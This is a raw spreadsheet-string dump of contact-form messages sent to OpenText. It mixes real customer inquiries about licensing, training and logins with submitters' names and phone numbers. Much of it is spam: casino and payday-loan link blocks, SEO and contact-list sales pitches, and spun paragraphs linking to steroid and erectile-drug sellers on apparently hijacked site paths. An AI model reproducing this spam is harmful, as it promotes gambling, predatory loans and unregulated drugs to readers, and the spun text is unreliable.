 Fully grasp your degree of depressive disorders. Major depression can be explained in many progressions, from minor to serious clinical despression symptoms. Moderate to reasonable major depression impacts thousands of people, most of who don't truly comprehend that they are stressed out. A mild form can be defined as 'the blues' or sensing a bit down, whilst moderate despression symptoms starts to have an effect on your daily life. Specialized medical depression is indeed extreme that somebody loses fascination with the outer world and activities behavior alterations. It is important to share the method that you feel along with your medical doctor or specialist._x000D_
  [url=http://www.personnellink.com.sg/images/cold.php?huni=Methandienone-Manufacturer-Methandienone-China-Oxymetholone-Manufacturer-630/]Methandienone Manufacturer[/url]_x000D_
 Take note of clothes used by the subject areas within your photographs, specifically tops. If at all possible make certain they are clear of logos and well known industrial advertising. Graphics day a picture and remove the "timeless" sensing that is certainly valued in years to come. They also significantly clash with normal landscape design in backyard conditions._x000D_
  [url=http://www.toimmigrate.com/components/com_akeeba/achieve.php?ei=424-Clomid-Usa-Oxandrolone-Price-Usa-Trenbolone-Pills.html]Clomid Usa[/url]_x000D_
 Do not spend time on untested merchandise. You might compose one thousand excellent content regarding a specific merchandise, and if there is no niche for it, your time could have been lost. A lot of people truly feel they have was unsuccessful at article marketing if the income do not come. What they may not understand is that the product on its own was the actual dilemma._x000D_
  [url=http://www.codeduc.cl/wp-content/uploads/achieve.php?ou=73-Boldeno</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://casinogameslistonline.com/]online casino real money[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t>Wir haben bereits eine bestehende Partnerschaft mit Ihnen für den amerikanischen Markt. Ich würde diese Partnerschaft auch gerne für "Europa" weiterausbauen wollen und würde mich über eine Kontaktaufnahme Ihrerseits freuen.</t>
  </si>
  <si>
    <t>Hi  eRoom Technology,_x000D_
_x000D_
I am PHP back-end and WordPress Developer looking for remote work at your company._x000D_
_x000D_
My website: _x000D_
http://www.cooldev.io_x000D_
_x000D_
Work examples:_x000D_
https://www.recoveryteam.org_x000D_
http://www.yosicare.com_x000D_
https://vipguestinvites.com_x000D_
https://quiknode.io_x000D_
_x000D_
Best,_x000D_
Milos</t>
  </si>
  <si>
    <t>Hello support,_x000D_
we would like to have information about course 3-0188 we found at the link https://www.opentext.com/training/coursedetails.html?id=2282_x000D_
_x000D_
About the course we would like to understand wich level of skill is required as prerequistes about opentext products to follow it. Is an average SAP basis skill ok in your opinion and experience?_x000D_
_x000D_
About the schedule of it: are there any other dates after the April 9th, 2018? Is it possible to follow the course also in Italy (Milan would be the best)? May we have some other informations about schedule the course in our offices in Milan?_x000D_
_x000D_
Thank you in advance_x000D_
Kind regards_x000D_
Mirko</t>
  </si>
  <si>
    <t>I've signed up for an OpenText account and tried verifying my email multiple times, but it doesn't seem to work. Can you explain what I'm doing wrong?</t>
  </si>
  <si>
    <t>For Job</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]online casino[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]play casino games online[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;best online casino&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]online casino real money[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;kasino&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino gambling[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;best online casino&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online casino games[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino games real money&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casino games real money[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games&lt;/a&gt;</t>
  </si>
  <si>
    <t>We are looking to digitize our employee files. Does your company accommodate that?</t>
  </si>
  <si>
    <t>Dear madam/sir, _x000D_
_x000D_
a customer of ours has an interest in DXP. Can you tell me more about the licensing model? Is the single seat only for windows desktop clients or also for a terminal server environment where only one user uses the software? In case of 2 users on the terminal server, do we need 2 single seat licenses and if yes, is this also the case when the software is being used by one person at a time? _x000D_
_x000D_
thank you for your answers,_x000D_
_x000D_
best regards,_x000D_
_x000D_
Patrick Smits</t>
  </si>
  <si>
    <t>Would like to know more about the opentext document management system</t>
  </si>
  <si>
    <t>We have misplaced our login credentials for our OpenText Rightfax Connect account. We need to recover our password in order to change our callerID settings on the Connect account. In case of a new password we also need instructions on how to update the RightFax Connect account details on our on-premise RightFax server.</t>
  </si>
  <si>
    <t>we would like a short call to discuss how your products can help us with a supplier relationship management platform</t>
  </si>
  <si>
    <t>I would like to understand how much it would cost to get eDocs document management system and whether there are ongoing costs etc. I am enquiring on behflaf of a proposal I am putting together._x000D_
Many thanks_x000D_
Paulina</t>
  </si>
  <si>
    <t>I am Head of IS on the Lower Thames Crossing project which is one of Highways England's major projects. We have been ask to look at transferring documents from our SharePoint to HE's OpenText implementation. I want to understand the potential licence and delivery costs involved in this for a briefing paper/business case. Thanks</t>
  </si>
  <si>
    <t>Dear Sir, my PC has Myriad ML, Build 8.1.0.8, Customer #19312,_x000D_
Some files I ask it for opening, Properties of the same file read cg4 file, MS Word will attempt opening it and naturally, an error comes up.  I know there is a place within Myriad for selection of files for their opening, but, I cannot find it. What may I do in changing opening from Word back to MYR? Life would be good. Regards, Everett</t>
  </si>
  <si>
    <t>Hi There,_x000D_
_x000D_
We are looking to process our orders with Macy's Backstage through an EDI system. We need to be set up with an EDI service provider. They recommend Inovis or GXS. _x000D_
_x000D_
Please can you advise if you will be able to assist us with this?_x000D_
_x000D_
Information which we need in order to be set up with Macy's is an EDI Qualifier and ID, the VICS version and the EDI network which we will be using for our account._x000D_
_x000D_
Please let me know if you need any further details._x000D_
_x000D_
Kind Regards_x000D_
Debbie Hall</t>
  </si>
  <si>
    <t xml:space="preserve">error accures when changing password_x000D_
OpenText Connect_x000D_
_x000D_
An Error Occurred updating password _x000D_
_x000D_
_x000D_
Set Your Password_x000D_
_x000D_
* indicates required field_x000D_
_x000D_
_x000D_
  _x000D_
New Password_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Verify Password_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casino games slots[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]casino games slots[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online casino slots&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]slot game[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;slot online&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]play casino games online[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino games slots&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino slots[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino slots&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casinos online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online gambling casino&lt;/a&gt;</t>
  </si>
  <si>
    <t>online loans _x000D_
[url=https://smajloans.com/]payday loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans online&lt;/a&gt; _x000D_
online loans</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
We are working through the possibility to acquire the documentum software. We would like to know the different kind of licenses (the prices and the specific features of each)._x000D_
_x000D_
We look forward to hearing from you soon,_x000D_
Kids and Us S.L.</t>
  </si>
  <si>
    <t>We currently support Brava Enterprise 6.2 for a couple of clients (BT, Expro) integrated into Lascom PLM to allow various attachemnt viewing (Office, CAD etc).  However, this is not working for AutoCAD 2018 drawings.  I am looking to get the installers for Brava Enterprise 16.2 and 16.3 to look at if I can update the 6.2 version currently in place and hence enable viewing of AutoCAD 2018 dwgs.</t>
  </si>
  <si>
    <t>payday loans no credit check _x000D_
[url=https://smajloans.com/]payday loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans no credit check&lt;/a&gt; _x000D_
payday loans online</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, unsere neue zentrale Blutbankensoftware verwendet unter anderem QRP Files zur Erstellung von Ausdrucken. Initial haben wir die QRP Files vom Hersteller zur Verfügung gestellt bekommen. Das nächste Update der Blutbankensoftware bzw. notwendige Berichtsänderungen machen es notwendig, dass wir eine Gupta Report Builder Version erwerben. Bitte nennen Sie mir eine Kontakt, über den ich die entsprechende Lizenz erwerben kann. MfG Stephan Federsel</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Can you please guide me for selecting trainings for OpenText solutions related with SAP? We want to organize OpenText classroom trainings in Turkey. _x000D_
_x000D_
Which courses should be prioritized? _x000D_
What are the course contents? _x000D_
What should be our budget expectations for a private class?_x000D_
_x000D_
Best regards,_x000D_
Anil Gorgulu_x000D_
SAP Education Turkey</t>
  </si>
  <si>
    <t>Request permissions to see/edit discussions</t>
  </si>
  <si>
    <t>Premièrement j'aimerais pouvoir avoir des informations en Français_x000D_
Et je voudrais être informée quant à la  dernière version de First Class disponible en français et comment faire l'installation</t>
  </si>
  <si>
    <t>Gostaria de informações sobre parceria para projetos.</t>
  </si>
  <si>
    <t>Licensing and pricing</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.lsclub.ru/sitemap/hirtue.php?pageid=116-Viagra-Generika-Viagra-Generika-Online-Viagra-Kaufen-Deutschland]Viagra Generika[/url]_x000D_
 When planning a getaway international, be sure you check into any essential or recommended vaccinations and speak with your physician early about obtaining them. If you crash to find the photographs that are required, you might grow to be quite sick while on a trip. Alternatively, even though you don't become ill, you could have difficulty re-entering the country and may even be forced into a time period of quarantine to make sure you aren't carrying any diseases._x000D_
  [url=http://www.vladimir-gortan.hr/Images/back.php?er=21-Cheap-Cialis-Uk-Cialis-Generic-Cialis-Generic-Best-Price.html]Cheap Cialis Uk[/url]_x000D_
 Now you incorporate some tips, it will be easy to start taking far more fantastic photos. With this particular expertise and a few determination to produce some effortless alterations in your capturing techniques plus your digital camera, you may get some pretty amazing photographs from the digicam that you are making use of.Believe Thin And Begin Shedding Weight Nowadays_x000D_
  [url=http://www.moinhodajuventude.pt/templates/error.php?h=119-Hgh-Wiki-Hgh-France-Hgh-Prix-Maroc]Hgh Wiki[/url]_x000D_
 You ought to call your lender, once you learn which you will not be able to spend your monthly bill on time. Many people tend not to enable their visa or mastercard business know and turn out paying out huge costs. Some lenders works along, should you inform them the situation before hand and they also might even turn out waiving any late costs._x000D_
  [url=http://www.ghafasebandi.ir/Media/main.php?page=37]Lovegra In Farmacia[/url]_x000D_
</t>
  </si>
  <si>
    <t>Dobrý deň._x000D_
Mám záujem o stálu verziu FREE Brava! DWG Viewer. Nemožem nikde najst free verziu ktorá funguje._x000D_
Ďakujem</t>
  </si>
  <si>
    <t>OPEN TEXT - I am trying to apply for your SLED (State Local Govt &amp; Education) sales position attached to your ATLANTA office.  For some reason the HR application website is down from my perspective.  Please direct me to another site where I can send my resume and file an application.  THANKS!!     P.S.   I am willing to relocate as necessary.</t>
  </si>
  <si>
    <t>I just purchased software and do not see how I can download the program?</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
We came across your contact details while doing internet search ._x000D_
We are currently working in Cameroon  and would like to partner with your organization within the framework of your activities  in order to draw inspiration from your wonderful activities and be guided/mentored. With them we can draw inspiration to improve/develop new ones for our activities._x000D_
United Action for Children(UAC) was founded in 1996 and registered in 1998 under the Cameroon’s 1990 law on Associations (registration No. 557/G37/014/1/VO4/T/T/OAPP of 3rd August 1998) as a non-profit community based organisation and member of Streetfootballworld Network. Its  the Host to the FIFA Football for Hope Centre in Cameroon, also Host to the ProjectWet in Cameroon and  engaged in Grooming Little Minds for a Big Future._x000D_
The overall goal of UAC is to contribute to the improvement of living conditions of key affected populations (Deprived People) such as orphans, street children, youth and young girls drug users, teenagers, women, sex workers…as well as in rural and urban areas._x000D_
We achieve this through three main program areas: agriculture, education, health, sewing, sports and economic empowerment._x000D_
– Under education program, we own and run two nursery/primary schools for orphans and vulnerable children. We also support formal and informal education(including literacy) of the targeted population, including providing educational materials (uniform, exercise books, pen, school fees, etc…), and providing life and vocational skills to underprivileged groups._x000D_
– Under the economic empowerment program,we are engaged in agriculture and  provide entrepreneurship skills, vocational training, carry out container farming and gardening in schools, encourage saving and credit schemes and income generating activities for unemployed women,_x000D_
youth and teenagers, animate and mobilize the community &amp; the target group to participate actively in liberating activities, we work for children, gender equali</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://casinogameslistonline.com/]cassino[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]slot game[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]slot online[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online casino slots&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]online casino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casino online[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online casino slots[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;best online casino&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]online gambling casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino online&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Dears,_x000D_
Is there anyway I can buy "Vendor Invoice Management (VIM) for SAP Solutions Consultant" book. How much would it cost and where can I find it ?_x000D_
_x000D_
Thanks,_x000D_
Waly Zidan_x000D_
UAE Phone: +971545593064_x000D_
Egypt Phone: +201224569310_x000D_
</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://casinogameslistonline.com/]casino online[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;play casino games online&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]kasino[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino slots&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]cassino[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;best online casino&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]slot online[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casino games&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino games[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;best online casino&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]cassino[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casino games slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino&lt;/a&gt;</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://casinogameslistonline.com/]online casino real money[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;casino games real money&lt;/a&gt; _x000D_
online casino games</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]online gambling casino[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;online casino real money&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]online casino[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;casino games&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]casino games[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casino games&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]slot online[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;online casino&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino slots[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino online&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casino games slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online gambling casino&lt;/a&gt;</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://casinogameslistonline.com/]casino games slots[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;slot online&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]cassino[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino slots&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]casino games[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]online casino gambling[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino games[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino online&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online casino gambling[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino games&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casino slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino&lt;/a&gt;</t>
  </si>
  <si>
    <t>casino slots _x000D_
[url=http://casinogameslistonline.com/]best online casino[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;best online casino&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casino slots[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino online&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]online casino slots[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;cassino&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]online casino real money[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casino games[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;online casino games&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]kasino[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]play casino games online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino slots&lt;/a&gt;</t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://casinogameslistonline.com/]online casino games[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]slot online[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino online&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]slot game[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online casino real money&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]online casino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casino online[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino slots&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online casino games[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;play casino games online&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casino games[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online gambling casino&lt;/a&gt;</t>
  </si>
  <si>
    <t>payday loans no credit check _x000D_
[url=https://smajloans.com/]loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;loans online&lt;/a&gt; _x000D_
payday loans no credit check</t>
  </si>
  <si>
    <t>We are a personal phone number, 978-254-5233 in Concord, MA, that constantly receives faxes late at night/early in the morning. (it is now 2:00 am) and our phone rings constantly from your number (1-800-396-9402) and from 1-817-881-0300 and from 1-732-800-0001 and from 1-732-800-0002 and other numbers on other days.  I don't know if all these numbers relate to your operation, but whichever ones do, please note that you are calling a wrong number.  We  are not a fax machine and want these annoying calls to stop.  I would like to know how you got our number because today is not the first day this has happened to us and it is extremely annoying as most of the calls come in after midnight.</t>
  </si>
  <si>
    <t>After reviewing your website our team can help you get the word out through digital marketing/lobbing online. Otherwords we can help you get your website to go viral. Whereas; it will generate more traffic to your website from our 36,485,392 PBN and soical media platforms. We invite you to send us a short synopsis about your goals for 2018. After our team reviews all the data that we can research online, we will formulte a free analyzes/strategy for you to review. Only if you are happy with our action plan. We can move forward. We would like very much to establish a life time relationship of growth with you._x000D_
_x000D_
Best regards,_x000D_
Chris Patterson CEO,_x000D_
Assured SEO &amp; Digital Consultancy_x000D_
seoespecialista.com</t>
  </si>
  <si>
    <t xml:space="preserve">How do you make a FirstClass account? I am new to it and I need to make an account </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ashupaulassociates.co.in/care/send.asp?llk=80-Cialis-Generico-Madrid-Comprar-Viagra-En-Andorra-Viagra-Generico-En-EspaÃ±a/]Cialis Generico Madrid[/url]_x000D_
 Article promotion is the best way to obtain your site discovered. Using the drive for valuable content material on the net, internet sites that offer absolutely nothing to visitors swiftly fall short. Publish good articles to boost your exposure on search engine outcome internet pages. The more effective the website, the greater the ranking will end up._x000D_
  [url=http://www.lipix.ru/Gallery/system.asp?m=197-Riptropin-Results-Jintropin-For-Sale-Uk-Jintropin-Hgh-For-Sale]Riptropin Results[/url]_x000D_
 1 great piece of fashion advice is to be sure that you examine your self from all of aspects before wandering your doorway. This will be significant simply because you do not want to be uncomfortable on account of possibly an unusual match, a spot, or leaving a tag on. Have somebody in addition to confirm to suit your needs at the same time, if possible._x000D_
  [url=http://www.globalwell-being.org/biller/yea.php?hen=Ansomone-Growth-Hormone-Hygetropin-Italia-Igf-1-Bodybuilding-40.html]Ansomone Growth Hormone[/url]_x000D_
 Everyone wants an expensive new apple iphone today but almost everyone has not a clue of methods this new technologies functions. The fantastic thing about this cell phone is perhaps all the programs available as well as the report listed below will get you approximately rate about what is surely an mobile app, and how they can better serve you._x000D_
  [url=http://www.filcon.com.au/images/pear.asp?ra=282]Human Growth Hormone Tablets[/url]_x000D_
</t>
  </si>
  <si>
    <t>payday loans online _x000D_
[url=https://smajloans.com/]online loans[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans no credit check&lt;/a&gt; _x000D_
loans online</t>
  </si>
  <si>
    <t>GS</t>
  </si>
  <si>
    <t>payday loans _x000D_
[url=https://smajloans.com/]payday loans[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans&lt;/a&gt; _x000D_
loans online</t>
  </si>
  <si>
    <t>online loans _x000D_
[url=https://smajloans.com/]payday loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;online loans&lt;/a&gt; _x000D_
payday loans no credit check</t>
  </si>
  <si>
    <t>payday loans _x000D_
[url=https://smajloans.com/]payday loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;online loans&lt;/a&gt; _x000D_
loans online</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.seashell.co.il/fancybox/fancybox/backup.php?ww=Igf-1-Lr3-Uso,Ansomone-Italia,Igtropin-Cycle-160/]Igf-1 Lr3 Uso[/url]_x000D_
 Realize you are providing the payday loan usage of your own personal business banking details. Which is excellent if you notice the money downpayment! Even so, they may also be producing withdrawals from your profile. Be sure to feel at ease with a firm getting that sort of entry to your bank account. Know can be expected that they will use that entry._x000D_
  [url=http://www.elominas.com.br/sliders/quit.asp?k=85]Kamagra Jelly Kaufen[/url]_x000D_
 Get rid of the arch out of your eye-brows in case you have an issue with dim groups under your eye. The arch within your eyebrows can produce a spherical shop around your eyes. This could exaggerate any dark communities you could possibly curently have. To remedy this, just tweeze your eyebrows in order that they are straighter._x000D_
  [url=http://www.fischereiverein-suenching.de/back/class.php?p=73]Kamagra Hamburg[/url]_x000D_
 Be sure to examine the place to see what kind of disasters may arise. You want to shield yourself when you acquire business real estate property in a area that is certainly vulnerable to natural disasters you need to make sure your house is covered with insurance._x000D_
  [url=http://www.electropars.ir/Images/Menu/book.php?kw=178.html]Vendita Cialis Generico Italia[/url]_x000D_
</t>
  </si>
  <si>
    <t>May I PLEASE ask again for an invoice on my recent license purchase? Your online system never showed me one after receiving my payment, and I need it to deduct the purchase from my taxes. Invoice number might be 184671, at least this is what the screen displayed, but the actual document was never seen or received. I have asked this question several times already, but you keep ignoring me. Thank you.</t>
  </si>
  <si>
    <t>https://www.werruft.info/telefonnummer/089462991/_x000D_
....._x000D_
Bitte hören Sie mit der aggressiven Akquise auf!!!_x000D_
MfG_x000D_
User</t>
  </si>
  <si>
    <t>Считается, что повышенный уровень глюкозы в крови является главной причиной развития диабета 2-го типа. Однако немецкие ученые доказали: резистентность клеток к инсулину может быть вызвана увеличением концентрации в крови метилглиоксаля (MG) - метаболита глюкозы. Подробнее читайте на сайте [url=http://dom-lady.ru]dom-lady.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Shemeka Stephens is the only  one that I  am going to be able too  help you with your life forever  and ever and I am giving you the  best in the world and the best interests of good things about this  that I am  going to give it to you  and your family  the best in the world can shemeka Stephens  get my taxes  today please  send Shemeka Stephens  TAXES on this for me  and the best in the world  and the best in the world </t>
  </si>
  <si>
    <t>Free dwg viewer brava request</t>
  </si>
  <si>
    <t>ücretsiz dwg viewer brava talebi</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team,_x000D_
_x000D_
Hope this email finds you well._x000D_
_x000D_
Let me introduce myself, my name is Jessica Cote._x000D_
_x000D_
I visited your website and found that your website has been diagnosed with many technical issues, which affected your Google Search Ranking._x000D_
_x000D_
Promote your website in Online and Increase the Business Sales by putting your website top in all search engines._x000D_
_x000D_
As per the trends in your industry – Over 80% of People are searching your products/services through online and getting by the same way. These rankings also influence by other channels of sales as well._x000D_
_x000D_
 It is the simple method—the more people who come to your website, the more potential customers you attract. Don’t waste your time to drive more traffic, increase sales, and improve your visual appearance._x000D_
_x000D_
  1. We have all the best expertise to take the risk and give you what we commit._x000D_
  2. If you are willing to have more business in online and more Return on Investment (ROI)     we are just an Email /Phone away_x000D_
 3. We can increase the number of visitors to your website, and get you on the top searches of all the search engines._x000D_
 4.  Affordable way to publish your website and get online business._x000D_
_x000D_
I will prepare the “Website Technical Analysis Report” and our “Price Quotation”, if you will be interested._x000D_
_x000D_
I'd be happy to send you our package, pricing and past work details, if you'd like to assess our work._x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
After getting your confirmations our senior technical person named Glean Richard will discuss with you._x000D_
_x000D_
Best Regards,_x000D_
Jessica Cote| SEO-Consultant_x000D_
</t>
  </si>
  <si>
    <t>best online casino _x000D_
[url=http://casinogameslistonline.com/]slot game[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online casino&lt;/a&gt; _x000D_
cassino</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://casinogameslistonline.com/]online gambling casino[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;casino games&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casinogameslistonline.com/]casino games slots[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;kasino&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>Со мной произошло тоже самое + мне не заплатили за последний месяц... _x000D_
=== _x000D_
Проходите мимо этой компании! _x000D_
Вся зарплата, которая обещается вам на собеседовании - все обман, платят 20 000 руб! _x000D_
Нужно из кожи вон выпрыгнуть, чтобы заработать на процентах что то большее. _x000D_
Крупный проект сразу вам никто не даст! _x000D_
Текучка ужасная, посмотрите хотя бы количество просмотров вакансии. _x000D_
Люди приходят - поработают день-два - неделю - 2 месяца и уходят, поняв, что делать там нечего! _x000D_
На зарплату при этом сильно не рассчитывайте, директор жадный до жути!!! _x000D_
Найдут тысячу и одну причину чтобы не платить. _x000D_
По трудовой устроить могут, если ты будешь приносить доход компании, но они сначала месяца 3-4 на тебя посмотрят, а не понравишься - хлопнут по крышке ноутбука - Пиши заявление на увольнение! _x000D_
Трудовой договор с работниками не подписывают, поэтому даже в суд на них подавать бесполезно! _x000D_
Сложно доказать что ты вообще в компании работал! _x000D_
ИСТОЧНИК: http://antijob.net/black_list/ooo_centr_metrologicheskogo_obsluzhivaniya__zelpribor/ _x000D_
=== _x000D_
Делайте выводы Господа, следует ли работать с такой компанией, если у них такое отношение к собственному персоналу...</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://casinogameslistonline.com/]online casino[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;best online casino&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://casinogameslistonline.com/]online casino gambling[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;slot online&lt;/a&gt; _x000D_
online casino gambling</t>
  </si>
  <si>
    <t>best online casino _x000D_
[url=http://casinogameslistonline.com/]casino games[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;casinos online&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
Do you want to reach out to your competitor’s customer base? We have over 300+ CRM Providers customer base with updated emails and phone numbers of key decision makers? We guarantee 90% accuracy on the Emails and 95% accuracy on all the other data information._x000D_
_x000D_
Some of the executives that might interest you:_x000D_
•   CIO’s_x000D_
•   CTO’s_x000D_
•   IT Directors_x000D_
•   CEO’s_x000D_
•   Head of CS_x000D_
